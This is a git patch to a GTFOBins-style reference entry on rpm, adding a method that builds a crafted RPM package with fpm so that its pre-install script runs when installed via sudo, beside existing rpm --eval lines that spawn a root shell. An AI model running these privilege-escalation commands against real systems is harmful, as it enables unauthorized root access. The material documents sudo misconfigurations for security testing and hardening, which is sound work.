From a0674eb8f0146997578ed4ba84e51d652a5e059e Mon Sep 17 00:00:00 2001 From: Emilio Date: Sat, 2 Feb 2019 15:54:57 +0000 Subject: [PATCH] Add other sudo to rpm thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ as in #51 --- _gtfobins/rpm.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 6e56eb0..6ef60ae 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -6,4 +6,13 @@ functions: - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' sudo: - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + - description: | + It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. + ``` + TF=$(mktemp -d) + echo 'id' > $TF/x.sh + fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF + ``` + code: | + sudo rpm -ivh x-1.0-1.noarch.rpm ---